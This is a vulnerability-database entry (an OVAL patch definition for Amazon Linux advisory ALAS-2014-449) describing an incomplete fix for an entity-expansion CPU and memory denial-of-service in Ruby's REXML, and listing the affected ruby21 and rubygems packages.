ALAS-2014-449 ---- ruby21 rubygem21 rubygems21ID: oval:org.secpod.oval:def:1600096 | Date: (C)2016-01-19 (M)2024-02-19 |
Class: PATCH | Family: unix |
The upstream patch for CVE-2014-8080 introduced checks against the REXML.entity_expansion_text_limit, but did not add restrictions to limit the number of expansions performed, i.e. checks against the REXML::Document.entity_expansion_limit. As a consequence, even with the patch applied, a small XML document could cause REXML to use an excessive amount of CPU time. High memory usage can be achieved using larger inputs.
Platform: |
Amazon Linux AMI |
Product: |
ruby21 |
rubygem21 |
rubygems21 |